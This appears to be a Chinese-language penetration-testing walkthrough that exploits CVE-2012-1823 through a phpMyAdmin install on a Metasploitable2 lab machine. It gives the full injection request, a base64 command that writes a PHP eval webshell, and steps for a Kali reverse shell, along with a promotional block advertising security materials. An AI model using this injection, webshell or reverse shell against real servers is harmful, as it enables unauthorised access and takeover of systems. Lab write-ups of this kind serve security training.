phpMyAdmin 未授权Getshell

前言

做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。

0x01漏洞发现

phpMyAdmin 未授权Getshell_第1张图片

环境搭建使用metasploitable2,可在网上搜索下载,搭建很简单这里不多说了。

phpMyAdmin 未授权Getshell_第2张图片

发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。

发现setup

phpMyAdmin 未授权Getshell_第3张图片

0x02漏洞利用

进行漏洞利用

phpMyAdmin 未授权Getshell_第4张图片

https://juejin.cn/post/7042901479388086285

POST
/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1

Host: 192.168.48.143

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: phpMyAdmin=bdbb427ed9c5e8616fe90261adcfb7229d6ca189;
pma_lang=en-utf-8

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 36

\

phpMyAdmin 未授权Getshell_第5张图片

这里利用的是CVE-2012-1823

?-d+allow_url_include%3don±d+auto_prepend_file%3dphp%3a//input

解码后

?-d allow_url_include=on -d auto_prepend_file=php://input

开启allow_url_include和auto_prepend_file

其中allow_url_include可以远程文件包含,auto_prepend_file加载php://input

其中php://input 可以读取http entity
body中指定长度的值,由Content-Length指定长度

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

写一句话木马getshell

echo “PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==” | base64 -d >shell.php

phpMyAdmin 未授权Getshell_第6张图片

phpMyAdmin 未授权Getshell_第7张图片

0x03反弹shell

利用kali现成的

cp /usr/share/webshells/php/php-reverse-shell.php ./1.php

修改这个ip

phpMyAdmin 未授权Getshell_第8张图片

修改ip

phpMyAdmin 未授权Getshell_第9张图片

phpMyAdmin 未授权Getshell_第10张图片

反弹shell成功,且无文件生成。

你可能感兴趣的:(渗透测试,漏洞挖掘,经验分享,phpMyAdmin,渗透测试,Getshell)